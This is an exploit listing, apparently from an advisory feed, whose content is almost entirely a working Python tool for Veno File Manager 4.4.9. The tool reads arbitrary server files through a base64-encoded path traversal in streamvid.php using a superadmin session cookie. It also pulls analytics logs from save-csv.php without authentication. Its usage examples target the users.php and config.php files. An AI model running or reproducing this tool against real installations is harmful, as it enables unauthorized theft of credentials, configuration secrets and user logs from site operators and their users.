
📄 Veno File Manager 4.4.9 Arbitrary File Read / Log Disclosure

Reported 19 Jun 2026 by indoushka · Type: packetstorm

Exploit tool for Veno File Manager 4.4.9 demonstrating an authenticated (superadmin-session) arbitrary file read through vfm-admin/ajax/streamvid.php and an unauthenticated analytics-log download through vfm-admin/admin-panel/view/analytics/save-csv.php.

Code
==================================================================================================================================
    | # Title     : Veno File Manager 4.4.9 - Exploit Tool                                                                           |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://veno.es/updates/logs/?slug=vfm/                                                                          |
    ==================================================================================================================================
    
    [+] Summary    : This script is an exploit tool for Veno File Manager 4.4.9 that demonstrates two security issues:
                     Authenticated file disclosure: with a valid superadmin session cookie it first POSTs starting_dir=./ to
                     vfm-admin/index.php and then requests vfm-admin/ajax/streamvid.php?vid=<base64 path>, which streams an
                     arbitrary server file back (post-authentication; a superadmin session is a precondition, not a result).
                     Unauthenticated log access: POSTs logsince/loguntil to vfm-admin/admin-panel/view/analytics/save-csv.php
                     and receives the analytics log export without any session.
                     Each check prints the response; the log export is additionally written to a CSV in the current directory.
    
    [+] POc        :  
    
    #!/usr/bin/env python3
    
    import requests
    import base64
    import sys
    import argparse
    from urllib.parse import urljoin
    
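    class VFMExploit:
        """Driver for the two Veno File Manager 4.4.9 issues this PoC demonstrates.

        * disclose_file_authenticated: post-auth arbitrary file read through
          vfm-admin/ajax/streamvid.php (requires a superadmin session cookie).
        * download_logs_unauthenticated: analytics log export through
          vfm-admin/admin-panel/view/analytics/save-csv.php, no session needed.

        Every request is sent with verify=False, so TLS certificates are never
        checked. That is convenient for lab targets with self-signed certs, but
        it also means the superadmin cookie is sent over an unauthenticated
        channel - do not point this at anything over a hostile network.
        """

        # Seconds to wait for connect/response; without it a target that accepts
        # the TCP connection but never answers would hang the tool forever.
        REQUEST_TIMEOUT = 30

        def __init__(self, target_url: str) -> None:
            """Bind the tool to the application root, e.g. http://host/vfm."""
            self.target_url = target_url.rstrip('/')
            self.session = requests.Session()

        def _url(self, path: str) -> str:
            """Return the absolute URL of an endpoint below the application root.

            Plain concatenation is deliberate: urljoin() treats a path that
            starts with '/' as site-absolute and drops the application
            sub-directory (http://host/vfm + /vfm-admin/x -> http://host/vfm-admin/x),
            so with the documented "-u http://target.com/vfm" usage every request
            was silently aimed at the wrong location unless VFM sat at the web root.
            """
            return self.target_url + path

        def disclose_file_authenticated(self, cookie_name: str, cookie_value: str, file_path: str):
            """Read an arbitrary server file using a superadmin session (issue 1).

            Step 1 POSTs starting_dir=./ to vfm-admin/index.php; step 2 asks
            ajax/streamvid.php to stream file_path (base64-encoded in the vid
            parameter), which is the request that returns the file contents.
            Step 1's response is not inspected - whether it took effect shows
            up in the result of step 2.

            Args:
                cookie_name: name of the session cookie (e.g. PHPSESSID).
                cookie_value: value of a valid superadmin session.
                file_path: path to read, relative to the install root or using
                    ../ segments (e.g. ../../config.php).

            Returns:
                The response body as text on HTTP 200, otherwise None (also on
                a network/TLS/timeout failure). Binary files are decoded as
                text by requests, so they may not round-trip byte-for-byte.
            """
            print(f"[*] Attempting to read file: {file_path}")
            cookies = {cookie_name: cookie_value}
            try:
                print("[*] Step 1: Changing initial directory to ./")
                self.session.post(
                    self._url("/vfm-admin/index.php"),
                    cookies=cookies,
                    data={"starting_dir": "./"},
                    verify=False,
                    timeout=self.REQUEST_TIMEOUT,
                )
                print("[*] Step 2: Reading file via streamvid.php")
                encoded_path = base64.b64encode(file_path.encode()).decode()
                # Passed via params= so requests percent-encodes it: base64 can
                # contain '+', '/' and '=', and a raw '+' in a query string is
                # read back as a space by the server, corrupting the path.
                response = self.session.get(
                    self._url("/vfm-admin/ajax/streamvid.php"),
                    params={"vid": encoded_path},
                    cookies=cookies,
                    verify=False,
                    timeout=self.REQUEST_TIMEOUT,
                )
            except requests.RequestException as exc:
                # Report instead of crashing so a combined run can still go on
                # to the log download.
                print(f"[✗] Request failed: {exc}")
                return None
            if response.status_code != 200:
                print(f"[✗] Extraction failed. Status code: {response.status_code}")
                return None
            print("[✓] File extracted successfully!")
            print("=" * 50)
            print(response.text)
            print("=" * 50)
            return response.text

        def download_logs_unauthenticated(self, start_date: str):
            """Download the analytics log export with no session (issue 2).

            POSTs logsince=start_date and a far-future loguntil to save-csv.php;
            the endpoint answers with the CSV export without requiring a login.
            A non-empty 200 body is printed (first 2000 characters) and written
            to logs_<start_date>.csv in the current working directory.

            Args:
                start_date: earliest log date to request, as yyyy-mm-dd.

            Returns:
                The CSV text, or None on a non-200/empty response, a network
                failure, or a failure to write the local file.
            """
            print(f"[*] Attempting to download logs since date: {start_date}")
            data = {
                "logsince": start_date,
                "loguntil": "3000-12-31",  # far-future bound: everything from start_date on
            }
            try:
                response = self.session.post(
                    self._url("/vfm-admin/admin-panel/view/analytics/save-csv.php"),
                    data=data,
                    verify=False,
                    timeout=self.REQUEST_TIMEOUT,
                )
            except requests.RequestException as exc:
                print(f"[✗] Error: {exc}")
                return None
            body = response.text
            if response.status_code != 200 or not body:
                print("[✗] No logs found or download failed")
                return None
            print(f"[✓] Logs downloaded successfully! ({len(body)} bytes)")
            print("=" * 50)
            print(body[:2000])  # console preview only; the saved file holds everything
            if len(body) > 2000:
                print(f"\n... and {len(body) - 2000} more characters remaining")
            print("=" * 50)
            # start_date is operator input that ends up in a local path; keep the
            # file inside the working directory even if it is not a clean date.
            safe_date = "".join(ch if ch.isalnum() or ch in "-_." else "_" for ch in start_date)
            filename = f"logs_{safe_date}.csv"
            try:
                with open(filename, 'w', encoding='utf-8') as f:
                    f.write(body)
            except OSError as exc:
                print(f"[✗] Error: {exc}")
                return None
            print(f"[*] Logs saved to file: {filename}")
            return body

        def exploit_all(self, cookie_name=None, cookie_value=None, file_path=None, start_date=None):
            """Run whichever checks the caller supplied arguments for.

            The file read runs only when cookie_name, cookie_value and file_path
            are all given; the log download runs when start_date is given.

            Returns:
                A dict keyed 'file_disclosure' / 'logs_download' holding each
                executed check's return value; empty when nothing was selected.
            """
            print("=" * 60)
            print("Veno File Manager 4.4.9 - Multi Exploit Tool")
            print("=" * 60)
            results = {}
            if cookie_name and cookie_value and file_path:
                print("\n[+] Executing Exploit 1: File Disclosure")
                results['file_disclosure'] = self.disclose_file_authenticated(
                    cookie_name, cookie_value, file_path
                )
            elif cookie_name or cookie_value or file_path:
                # Partial input used to be ignored silently, which reads like a
                # successful no-op; say why nothing happened.
                print("\n[!] Skipping file disclosure: it needs a cookie name, a cookie value and a file path")
            if start_date:
                print("\n[+] Executing Exploit 2: Log Download")
                results['logs_download'] = self.download_logs_unauthenticated(start_date)
            return results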
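    def main():
        """Parse the command line, validate the selected checks and run them.

        --file is only meaningful together with --cookie-name and --cookie-value
        (the file read needs a superadmin session); --logs works on its own.
        At least one check must be selected, and --logs must be a yyyy-mm-dd
        date because the value is both sent to the server and reused as part
        of a local file name.
        """
        from datetime import date  # local import: main() is the script entry point

        parser = argparse.ArgumentParser(
            description='Veno File Manager 4.4.9 - Exploit Tool',
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="""
    Examples:
      python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file vfm-admin/_content/users/users.php
      python exploit.py -u http://target.com/vfm --logs 2024-01-01
      python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file ../../config.php --logs 2024-01-01
            """
        )
        parser.add_argument('-u', '--url', required=True, help='Application path (e.g., http://target.com/vfm)')
        parser.add_argument('-c', '--cookie-name', help='Session cookie name for authentication')
        parser.add_argument('-v', '--cookie-value', help='Session cookie value for authentication')
        parser.add_argument('-f', '--file', help='Path of the file to read (e.g., ../../config.php)')
        parser.add_argument('-l', '--logs', help='Download logs starting from date (yyyy-mm-dd)')
        args = parser.parse_args()

        # Previously a partial set of file-read options was silently ignored and
        # the run looked successful while doing nothing; fail loudly instead.
        wants_file = bool(args.cookie_name or args.cookie_value or args.file)
        if wants_file and not (args.cookie_name and args.cookie_value and args.file):
            parser.error("--file requires both --cookie-name and --cookie-value (superadmin session)")
        if args.logs:
            try:
                date.fromisoformat(args.logs)
            except ValueError:
                parser.error(f"--logs expects a yyyy-mm-dd date, got {args.logs!r}")
        if not args.file and not args.logs:
            parser.error("nothing to do: pass --file (with cookies) and/or --logs")

        # Every request uses verify=False; silence the per-request warning so it
        # does not drown the tool's own output.
        import urllib3
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

        exploit = VFMExploit(args.url)
        exploit.exploit_all(
            cookie_name=args.cookie_name,
            cookie_value=args.cookie_value,
            file_path=args.file,
            start_date=args.logs
        )

    if __name__ == "__main__":
        main()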
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
